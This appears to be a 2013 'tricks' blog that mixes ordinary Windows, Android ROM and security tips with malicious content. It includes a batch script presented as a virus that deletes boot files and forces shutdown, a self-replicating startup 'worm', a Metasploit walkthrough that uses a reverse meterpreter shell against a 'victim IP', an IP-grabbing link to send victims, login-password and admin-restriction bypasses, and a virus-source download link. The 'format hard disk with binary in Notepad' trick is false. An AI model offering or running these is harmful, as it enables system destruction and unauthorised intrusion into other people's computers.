Tuesday, 30 July 2013
Hide your Local Disk Drive Without Software use.
As Every computer user have some personal or private data which they want to hide or protect from others.
If you want to Store Less amount data which you can easily Store in Folder. Then i recommends you to read My Folder Locking Post.
But If You want Hide large account of data or want to hide full drive from others. Then follow these steps carefully
Step To Hide Drive
Go To Start >> Then Run >> Then Type Diskpart
New Window will open Then Type list volume press enter
Now your all drive will appear, now if you want to hide Drive D
Then Type select volume 2 and press enter.
Then Type remove letter D and press enter again.
Now Go to your my computer then you will find that your D drive is hidden.
Step To Unhidden your Drive
Go To Start >> Then Run >> Then Type Diskpart
Then Type list volume press enter
Now your all drive will appear, now if you want to unhidden Drive D
Then Type select volume 2 and press enter.
Then Type assign letter D and press enter again.
Now Go to your my computer then you will find that your D drive is unhidden.
Then your Hidden drive will start appearing. Lets take one look on all steps in this figure
If there any Problem or trouble with this tricks then leave your comment.
PLEASE HELP US TO SPREAD OUR WORDs :)
trick to crash anyone's PC or Laptop
Virus That will Crash anybody's PC
@echo offattrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini @echo off msg * YOU GOT OWNED!!! shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
===================================
Save as bat file in notepad!!
This will pop up a message saying OWNED!!
And shut down the computer never to reboot again!
Type this in notepad
===================================
start virus.bat virus.bat and save as with this name - virus.bat
===================================
Your antivirus will not detect this virus.
Basically this program will delete all that files which are needed for booting If your os is installed in d drive instead of C then replace c with D.
Best ROM for Samsung Galaxy Y Duos GT S6102
Now a days after using phone we feel to change everything in that phone. And the answer to change the phone is to change its ROM..
Before installing rom we feel that our phone will brick. You don't have to worry the Rom I am telling is safe as I used this Rom . Best from for Samsung galaxy y duos gt s6102 is Gingericejelly v2
Who is created by Uchicha in Xda.
Features of the Rom:
CLEAN MULTI CSC SUPPORT !!!
Based On Original DXLL1 Firmware [PORTED TO]Original DXMA2 Firmware
Cyanogenmod Theme as Default Theme
GingerBread, IceCreamSandwich, JellyBean & Cyanogenmod Original Sounds
Pre-rooted Super SU
Fully Deodexed
Zipaligned
Busybox Installed
init.d Scripts Support
Bash Shell Support
Nano Text Editor
sysrw/sysro support via terminal emulator
Custom Boot Animation
15 Status Bar Toggles
Swipe to Remove Notification
A new Jelly Bean Task Manager (Recent apps List)
ROBOTO as System Font
New Look Settings with Aded Item
Build In Ad-Block Support /source by AdAway
Jelly Bean Look Keyboard
Jelly Bean Digital Clock
Moded TWLauncher as Default Launcher
Moded Samsung LockScreen as Default Locker
Moded MyFiles as Default Explorer
No-frills CPU as CPU Control
Better GPS
Customize How Your Phone Running With Andoid Assistant
Cyanogenmod Calculator
Cyanogenmod Sound Recorder
Bundled With build.prop Editor
Flash Player Support
System App Installer
System App UnInstaller
Terminal Emulator
GoogleTranslate
TubeMate ( Replace Youtube.apk )
MANY GREAT HOLO-fied THEMED .apk
Installation guide
Your phone should be rooted *STEP by STEP GUIDE INSTALL :
Clean Your Phone and SDCard
Copy CWM In Fresh SDCard and PUT Your SDCard In Your Phone
Boot Your Phone Into Recovery Mode
Select "apply update from sdcard" > Go Into CWM
Select "advanced" > "partiton sdcard"
Input Your "ext size"
You Can Input Swap Size To... ( Recomended 128 )
Wait Until CWM Task Completed
Turn Off Your Phone
Pull Your SDCard Prom Phone Again
Copy CWM and GingerIceJelly v2.0.RC1.zipTo Your SDCard Again
Put Again Your SDCard To Your Phone
Boot Into Recovery Again
Select "wipe data/factory reset" > Choose "yes"
Select "wipe cache partition"
Select "apply upate from sdcard" > Go Into CWM
Select "wipe data / reset" > Choose "yes"
Select "wipe cache partition" > Choose "yes"
Select "advanced" > Choose "wipe dalvik cache" > Select "yes"
Select "wipe battery stats" > Select "yes" ( ONLY IF YOUR BATTERY FULL )
Press Back Button
Select "mounts and storage"
Mount "/data, /sdard & /system"
NOTE :
If In CWM Shows "unmount", It Means Partition Has MOUNTED !!!
If In CWM Shows "mount", It Means Partition Still NOT MOUNTED !!! ( You Need To Mount That )
When All Mounted, Press Back Button
Select "install zip from sdcard"
Select "choose zip from sdcard"
Select GingerIceJelly v2.0.RC1.zip> Choose "yes"
Wait Until All Completed
After All Complete, Press back Button
Al Last, Select "reboot system now"
You Need To Be Patient NOW !!!
In First Boot It Take Little Long Time and SOMETIMES Boot Sounds Will Not Heard, So Dont Panic...
Touch GIJv2 Image and Ready To Setup Your Config and Account
AFTER YOUR PHONE BOOTUP, DONT DO ANYTHING FOR NOW !!!
WAIT UNTIL YOUR PHONE, FINISHED EXECUTE ALL TASK !!!
WHEN ALL TASK FINISHED, REBOOT YOUR PHONE !!!
TO MAKESURE ALL FILES REGISTERED SUCESSFULLY !!!
After Your Phone BootUp For The Second Time... Congrats GIJv2 Was Insttaled In Your Phone !!!
Download
SINGLE LINK
Download : GingerIceJelly v2.0.RC1
You can find screen shot and update by clicking here..
note :- after installing the gingericejelly you cannot remove your memory card from the phone because avery system application is installed in the memorycard..
you will loose all your memorycard data after making ext partition and swap size..
Virus codes for notepad
You can Downlaod the Virus_Source.zip from the link below :
http://rapidshare.com/files/82708010/Virus_Source.zip
List of 400 Virus Source Codes
Avispa.dr
Dark Avenger
AVA.550
Univ/a
Auspar.377
Auspar.338
OC/oops
Middle
Auspar.635
Aus-Term.mp.3490
Jeru.1413
OC/scud
Auspar.dr
Auspar.635
Auspar.615
Auspar
Aust.543
Auspar.424
Auspar.377
Auspar.338
Auspar.292a
Auspar.215
Auspar.187
Auspar
Univ/b
Aurea.653
Iron-Maiden
Akuku.1111
Akuku.889
Akuku.886
NRLG.b
Attitude
Attention.394
HLL.ow.4505
Attention.394.dam
Xany
Univ/g
Univ/q
Univ.cmp
OC/vcl
Atomant.2143
AT
Atomic.350
Astra.1010
Suriv.dr
Comasp
Shocker.cmp.7000
Tiebud
BtDr.b
Ash.743
Univ/r
Armagedon.y
Armagedon
Vienna
ARCV.Scy.1208
ARCV.Scroll.795ARCV.Scroll.dr)
ARCV.Sand.1172
ARCV.More
ARCV.Kiss
ARCV.Jo.986
ARCV.Jo.912a
ARCV.250.dr
ARCV.642
ARCV.639a
ARCV.1183.dr
ARCV.Anna.742.dr
ARCV.639a
ARCV.Jo.916
ARCV.839
ARCV.Slime.773
ARCV.Ice
ARCV.Ice
Univ/q
ARCV.330a
ARCV.255
Crew.2480
Univ/o
7thSon.426
Arara.dr
Arara.1054
Arab.834
Armagedon.y
QScreen3
Suriv.1488
Suriv.dr
Dark Avenger.2000
Jerusalem.cr
Jerusalem.cr
APLittle.153
APLittle.150
APLittle.147
APLittle.142a
APLittle.118a
APLittle.153
Univ.topsy
Anti-Pascal
Tiny-GM.129
Jerusalem
BtDr.Unk2
Jeru.1605
AntiMIT
Antiexe
Murphy
Thanksgiving.mp.1253a
Anticad.3012a
Anticad.mp.4096.d
Anticad.2900
Anticad.mp.4096.a
Anticad.2646
Anthrax.mp.1024
Univ.ow/d
Vacsina.1206
ARCV.Anna.742.dr
HLLP.Animus
Andromeda
Jerusalem.ch
Jeru.1808.a
QZap141
Pixel.845
Pixel.k
Ambulance
AlphaStrike.2000
Alien.733.a
Alia.1023
YD.1049.a
Alex.1951
Brain
Albania
Alabama.1560.a
Akuku.886
Tiebud
BtDr.Aircop
BtDr.b
HLL.ow
HLL.cmp.8064
AHADisk
Agiplan
YDOC/vcl
Syslock.dropped
NRLG.b
V2P6.1993
Dead
BitAddict
ARCV.Scroll.795
ARCV.Scroll.dr
Acid.dr
- See more at: http://trickmobiz.blogspot.in/2013/05/virus-code.html#sthash.uJBN4LTO.dpuf
how to format harddisk using notepad
Format hard disk using notepad
Format Hard Disk Using Notepad
Write The Following In Notepad Exactly as it says
1. Write the following code : 01001011000111110010010101010101010000011111100000 2. Save it as a .exe file. For Example -Virus.exe 3. Now, If you run the program, means it will format the Hard Drive.
NOTE: This is for learning purpose only!
want to increase ur desktop speed??here you go!
Trick to increase internet speed
This is not just one trick but a series of simple trick that lets you significantly increase you internet speed and i guarantee you an increase in your internet speed. This trick works on all windows machine including XP, Vista and windows 7.
1] go to desktop->My computer-(right click on)->properties->then go HARDWARE tab-> Devicemanager-> now u see a window of Device manager then go to Ports->Communication Port(double click on it and Open). after open u can see a Communication Port properties. go the Port Setting:----and now increase ur "Bits per second" to 128000. and "Flow control" change 2 Hardware
2]type this coding in notepad and save as .reg and then execute this file....this will increase ur surfing n downloading speed.....
REGEDIT4 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Tcpip\Parameters] "SackOpts"=dword:00000001 "TcpWindowSize"=dword:0005ae4c "Tcp1323Opts"=dword:00000003 "DefaultTTL"=dword:00000040 "EnablePMTUBHDetect"=dword:00000000 "EnablePMTUDiscovery"=dword:00000001 "GlobalMaxTcpWindowSize"=dword:0005ae4c
3]Xp reserves 20% bandwith, to unreserve it,follow following steps:
a)Click Start
b)Run:"gpedit.msc"
c)Goto:>Local Computer Policy -------–>Computer Configuration -------–>Administrative Templates -------–>Network–>QOS Packet Scheduler -------–>Limit Reservable Bandwidth
d) Double click on Limit Reservable bandwidth
e)Select Enable
f) Change 20% to 0%
g)Click Apply
Enjoy!
- See more at: http://trickmobiz.blogspot.in/2013/05/trick-to-increase-internet-speed.html#sthash.THHEHEIs.dpuf
how to make easy worm in your computer
How to Make an Easy Worm Virus With Two Lines of Code
This will teach you how to create an easy virus with simple steps and two lines of code.
Edit Steps
1
Log on to your computer as an administrator.
2
Go on C drive and create a folder, name it "Programs"
3
Open up notepad and type in "@echo off"
4
Then, write "Copy C:\Programs\virus.bat C:\Programs" on the second line. On the third line write "Start C:\Programs\virus.bat".
5
Click "Save as" and save as virus.bat in the file (Programs) you just made.
6
If you want the worm to start whenever the computer starts, right click on "virus.bat" and click create shortcut. A shortcut will be made on programs.
7
Right click on the shortcut icon and click "cut".
8
Right click on the shortcut and click "copy".
9
Right click on your start menu and click "explore".
10
Go to All Programs, then find the file named startup.
11
Paste the shortcut onto the startup folder.
12
Right click on the shortcut and go to properties, click on hidden, then press "Apply" or "OK".
13
You have successfully made a working worm virus. To start it, restart your computer and the disk space on C drive will be eaten away.
14
To get rid of the worm virus just simply delete the "programs" file.
Edit Tips
If you want to hide the programs file, go to properties and click hidden.
In order to delete the batch file, click "show hidden files" on folder properties and delete the shortcuts. In startup menu, they will be automatically started on system boot.
Saturday, 27 July 2013
how hack windows pc
How to hack PC [Windows 7] (Metasploit)
Hello everybody... I have decided to write some tutorial how to hack pc with Windows 7 OS...
It is simple...Just follow me... And everythin will be good.. ;)
Start
- - - - - - - - - - - - - - - - -
First open you Metasploit Console and type:
nmap -sV -sT -O xx.xxx.xxx.xx (xx.xxx is victim IP)
Then when you are sure that victim have Windows 7 you must to chose one exploit....
For this tutorial i will using this, type:
use windows/mmsp/ms10_025_wmss_connect_funnel
After that we need some PAYLOAD the best is meterpreter..type:
set PAYLOAD windows/meterpreter/reverse_tcp
Then you must to set LHOST=your ip and RHOST=victim ip,for that type:
set LHOST youripadress
(if you dont know just type in terminal ifconfig)
Then type:
set rhost RHOST victimsIp
(Here comes victims ip)
When you done this, here comes the best command, type:
exploit
Now when you are connected to victims pc and when you have meterpreter shell type:
help
Now you will see some commands.. There is a lot of them just read them and use it... Happy hacking
want to know how to grab someone"s ip address??
In this tutorial i will you show you how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.
How To Do ?
1. Copy the below codes into Notepad and save it as Grab.php (.php is must)
2. Now make Free account on any of the free web hosting sites Ripway or on My3gb .
3. Now Upload Grab.php to your web hosting site.
4. Copy the link of your uploaded file and send it to victim.
5. As soon as victim will click on your link his ip will be saved in your free web hosting site.
6. Enjoy you are Done !!
- See more at: http://www.coolhackingtrick.com/2011/11/how-to-grab-someone-ip-address.html#sthash.ZX65N3uL.dpuf
create undeletable and unrenamable folders in windows
In this tutorial you will learn cool and simple trick to Create an undeletable and unrenamable Folders In Windows operating system. Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below.
Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to create folder with above mentioned names, Because they are reserved words in windows.
How To Create Undeletable And Unrenamable Folders ?
Go to Start and then Click on Run
Type cmd & hit enter (To open Command Prompt ).
Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
Type D: or E: and hit enter
Type md con\ and hit enter (md - make directory)
You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
Open that directory, you will see the folder created of name con.
Try to delete that folder or rename that folder windows will show the error message.
How to delete that folder ?
It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.
Open Command Prompt
Type D: ( if u created this type of folder in D: drive) & hit enter
Type rd con\ (rd - remove directory)
Open that directory and the folder will not appear because it is removed.
want to see saved passwords in safari??dont know how to do??here it is!!
Hi...
Go to your Safari menu bar, click Safari > Preferences then select the Autofill tab.
Click the Edit buttton to the right of User names and passwords to see stored User names.
Your passwords are stored in Keychain Access located in /Applications/Utlities
In the Keychain Access window select Passwords on the left.
Type in the name of a website you want to see your password for in the search field top righrt corner of that window then double click that Keychain then select the Attributes tab then click: Show password You may be prompted for your admin password.
DISPLAY A NOTICE EVERY TIME WINDOWS STARTS
Display a notice every time Windows starts
You can use this trick if you want a message to be displayed every
time Windows starts(Any Version). Go to START --> RUN. Type REGEDIT & press ENTER.
Then Go to:-
?HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon?. Create a
new string values as follows.
Name: LegalNoticeText and Value: Your message here
After Doing this, restart your Windows, a dialog box should
appear before the Windows startup which will have u're message written on it.
Enjoy.
BREAKING THE RESTRICTIONS OF ADMINISTRATOR BY "UNPLUGGING METHOD"
Breaking the Restrictions of the Administrator by "UNPLUGGING METHOD".
This works on WIn 2000 & WIN XP.
I will teach u how we can gain access to the website you want to
for free, and how you can gain access to 'control panel', and the various
other tools of Widows that may have been blocked from your grasp like 'regedit'.
When u are at the log on screen, type in your username and
password. NOW When you hit enter, and it comes up with
the next screen, the rectangle one, immediatly pull out the network
cable i.e. the cable wire.
HACKING WINDOWS LOGIN PASSWORD
Hacking Windows Login Paswords
During Windows startup press F8 key (i.e., before the startup
splash screen) and select ?command prompt only?. Go to c:\windows
directory and delete the password file(*.pwl ? where * is the
username) and restart the system. When the password dialog box or the
pops up appears, type the username(previous One) and enter any password of u're choice. Windows should accept any password.
THIS HAS KNOWN TO WORK FOR WIN98 & WIN ME & IT MIGHT WORK FOR OTHER VERSONS AS WELL.
posted by Gurneet Singh at Monday, November 28, 2005 1 comments
How to Gain Access to a Blocked Folder In WIN NT
If u're system administrator has blocked or denied access to any of u're
drives or folders, u can access them easily.
Just open any application program such as notepad , ms
word, exel etc then :
Simply GO to FILE then goto OPEN, U will be in my documents folder ,
then u can go the folder to which u want but the rights are not provided,
single click on that folder & press [ control + c ] .
Now go to the folder to which u have the rights & press [control + v ]
The folder gets copied to the folder to which u have rights to Access.
So that u can access that folder.
And open the File u Want.
top 10 windows 8 tips and tricks
Top 10 Windows 8 tips and tricks
Customize your tiles
Make the most of your Windows Start screen tiles by adjusting the sizes, where they are located, and what is listed.
Move any tile by clicking and dragging the tile. While moving a tile, if you need a larger view of the Start screen move the tile towards the top or bottom of the screen to zoom out.
Use your mouse wheel to scroll left-to-right through your tiles.
Any Desktop shortcut or program can be pinned to the Start screen by right-clicking the icon and choosing Pin to Start.
In the bottom right-hand corner of the start screen is a magnifying glass with tiles, click this icon to get a zoomed out view of your Start screen. In this view, if you right-click on a group of tiles you'll be given the option to name group, which can be useful if you have a group of related tiles (e.g. games). In this view, you can also click and drag a group to organize your tile groups.
Create a new speed bump between tile groups by moving a tile to a speed bump.
Resize any User tile or Live tile by right-clicking the tile and choosing resize.
If there is a tile you want on your Taskbar, right-click the tile and choose Pin to taskbar.
Show admin applications on the Start screen by clicking Settings in Charms, click Settings, and change the Show administrative tools from No to Yes.
In Internet Explorer 10, you can also pin any of your favorite web pages to your Start Screen.
Windows 8 keyboard shortcuts
Knowing at least some of the Windows 8 keyboard shortcuts will make your Windows 8 experience much more enjoyable. Try to memorize these top Windows 8 shortcut keys.
Press the Windows key to open the Start screen or switch to the Desktop (if open).
Press the Windows key + D will open the Windows Desktop.
Press the Windows key + . to pin and unpin Windows apps on the side of the screen.
Press the Windows key + X to open the power user menu, which gives you access to many of the features most power users would want (e.g. Device Manager and Command Prompt).
Press the Windows key + C to open the Charms.
Press the Windows key + I to open the Settings, which is the same Settings found in Charms.
Press and hold the Windows key + Tab to show open apps.
Press the Windows key + Print screen to create a screen shot, which is automatically saved into your My Pictures folder.
See our Windows shortcuts page for a full listing of all Windows shortcuts.
Know your hot corners
The corners on your screen are hot corners and give you access to different Windows features. Below, is a brief explanation of each of these corners.
Bottom Left-hand corner
The bottom left-hand hot corner of the screen will allow you to access the Start screen, if you're in the Start screen and have the Desktop open, this corner will open the Desktop from the Start screen.
Tip: Right-clicking in the left hand corner will open the power user menu.
Top-left corner of the screen
Moving the mouse to the top-left corner and then down will display all the apps running on the computer. Clicking and dragging any of these apps to the left or right-hand side of the screen will snap that app to that side of the screen. Each of these open app icons can also be right-clicked to close or snap.
Right-hand side of the screen
On the full right-hand side of the screen will be given access to the Windows Charms.
Taking advantage of search
The Search in Windows 8 has been significantly improved when compared to all previous versions of Windows. To search for a file or run a program in Windows 8 from the Start screen just start typing what you're trying to find or want to run.
As you begin typing, the results will start appearing on the left-hand side. In addition to being able to search for files and run programs, the Search also supports limiting the search to apps such as Finance, People, Maps, Photos, Mail, Music, Videos, Weather, and much more. If what you are searching for is not a file or program, click on the app you wish to use as the search. For example, if you were searching for "New York" and selected the Weather App you would be shown the weather in New York, NY.
By default, Search organizes the available Apps by how frequently they are used and then in alphabetical order. If you want to keep your favorite app at the top of the Search list, right-click the app and choose Pin. Pinning the app will lock it in place regardless of how often it is used. If there is an app you don't want (e.g. Finance) you can turn on and off any of the search apps through the PC settings, which is found under the Settings in the Charms.
Bonus tip: The Search is also found through Charms and can also be opened by pressing Windows key + F.
Running two apps side by side
Any app can be pinned to the left or right-hand side of the screen. For example, open the People app and then press the Windows Key + . (period) to move that app to the right-hand side of the screen, pressing the same keys again will move it to the left-hand side, and pressing the same keys again will make it full screen. While an app is pinned, any other app or program can be opened and loaded into the available space on the screen. For example, in the below picture, we've opened a browser window and have the People app running to monitor our social networks.
Windows 8 People
Any open app can also be pinned using your mouse by clicking at the top of the tile and dragging it to the left or right-hand side of the screen.
Bonus tip: The Desktop can also be pinned to the left or right-hand side of the screen.
Note: In order for snap to work properly your resolution must be at least 1,366 x 768.
Windows 8 Task Manager
The Windows 8 Task Manager has been significantly improved over previous versions of Windows. Some of the new changes include showing a total percent usage at the top of your Processes, which makes it easier to determine total memory and CPU usage, improved Performance graphs, a Startup tab to see startup processes and their impact to system performance, and the App history tab (as shown below) that gives you the total resources an app has used over a period of time. Press Ctrl + Shift + Esc to start exploring the new Task Manager.
Windows 8 Task Manager
Use a picture password to log into your computer
Windows 8 includes a new feature called Picture password, which allows you to authenticate with the computer using a series of gestures that include circles, straight lines, and taps. Enable this feature if you want a new way to access your computer or have a hard time with passwords.
Open the Windows Charms.
Click Settings and then More PC settings
In the PC settings window click Users and then select Create a picture password
Bonus tip: A four digit pin password can also be created and used to access your computer.
Take advantage of Windows 8 apps
Windows 8 comes included with several apps to help you get the most from your computer. Below are just a few of the included apps.
People
Microsoft touts the People feature in Windows 8 because they understand how many people are using social networks today. In the People feature you'll be able to connect your Windows computer to all the major social networks including Facebook, LinkedIn, and Twitter. Once connected, you can pin the people app and monitor your social network (as shown below), use People in Search to find people, and get an overview of what is happening in all your social networks.
Windows 8 People
Reader
The Reader app will give you PDF support right out of the box.
SkyDrive
The SkyDrive app will give you access to the Microsoft cloud service SkyDrive, which allows you to store your photos, documents, and other files in the cloud and access or share those files with any computer with Internet access.
Store
Take advantage of the Windows Store and install one or more of the thousands of available apps designed for Windows 8. The Store is found in the Start screen, or use Search to search the Store app for any apps that you are trying to find.
Sunday, 7 July 2013
want some tricks to secure ur new pc??here it is!!
Every one of us wants to secure our new PC form a certain damage . So
here i am going to gives you New PC tricks that helps you to make your
new PC more secure.
1. Remove Unneeded Software
Many believe that a new PC fresh out-of-the box that has yet to be exposed to the Internet is secure. Nothing can be further from the truth. Many machines come with software installed on it that makes your machine extremely vulnerable to an attack. A general rule-of-thumb is the less software on the computer, the easier it is to secure it.
Do an inventory of all the software that is on your machine, and make sure you are actually going to be using every piece of software that’s installed. In addition, unnecessary software (especially software that’s running in the background) can slow down the operation speed of software that you are actually using.
2. Install Microsoft Security Patches
Run Windows Update to install Microsoft security patches that are missing from your machine. Chances are high that new viruses and bugs in the software were created/discovered and (hopefully) addressed since your Operating System was installed on your computer. Run Windows update to make sure your computer is up to date with all of the latest Windows patches.
3. Configure Your Anti virus Software
The last thing we recommend is for you to customize the anti virus software that’s running on your computer. Having anti virus installed on your computer is a great start, but it’s not recommended to trust that your anti virus is automatically configured to provide the maximum levels of security for your system.
There are many different anti virus software out on the market, so it’s tough for us to tell you how your particular anti virus software should be configured. However, a Google search should help you find adequate guidance on properly fine-tuning the anti virus software you’re using.
Apply these three new PC tricks on your new PC to make it more secure
About these ads
1. Remove Unneeded Software
Many believe that a new PC fresh out-of-the box that has yet to be exposed to the Internet is secure. Nothing can be further from the truth. Many machines come with software installed on it that makes your machine extremely vulnerable to an attack. A general rule-of-thumb is the less software on the computer, the easier it is to secure it.
Do an inventory of all the software that is on your machine, and make sure you are actually going to be using every piece of software that’s installed. In addition, unnecessary software (especially software that’s running in the background) can slow down the operation speed of software that you are actually using.
2. Install Microsoft Security Patches
Run Windows Update to install Microsoft security patches that are missing from your machine. Chances are high that new viruses and bugs in the software were created/discovered and (hopefully) addressed since your Operating System was installed on your computer. Run Windows update to make sure your computer is up to date with all of the latest Windows patches.
3. Configure Your Anti virus Software
The last thing we recommend is for you to customize the anti virus software that’s running on your computer. Having anti virus installed on your computer is a great start, but it’s not recommended to trust that your anti virus is automatically configured to provide the maximum levels of security for your system.
There are many different anti virus software out on the market, so it’s tough for us to tell you how your particular anti virus software should be configured. However, a Google search should help you find adequate guidance on properly fine-tuning the anti virus software you’re using.
Apply these three new PC tricks on your new PC to make it more secure
About these ads
All (Ctrl+Alt+Del) Permanently deleted files Recovery solution
For all those folks,
Here is the solution
Software called "Kissass Undelete" , can bring those files from the hard disk or your flash drive.
Conditions
: Only if the data on that drive is not re-occupied(or written). that
means the space which was available after the deletion is not been
occupied after the deletion.
Click Here to download the .
1)
To start searching for the files,
Select the drive from the Left panel of the Windows and Click the scan button.
the Scan might take upto 10 secs.
2)
When
the files search has been completed, it will show you the results with
the name, typ, size and the last modified date of the searched file.
3)
Now you can select the file to be recover. This is an Open source
application and available for All Windows OS(Windows XP/Vista/ 7).
Subscribe to:
Posts (Atom)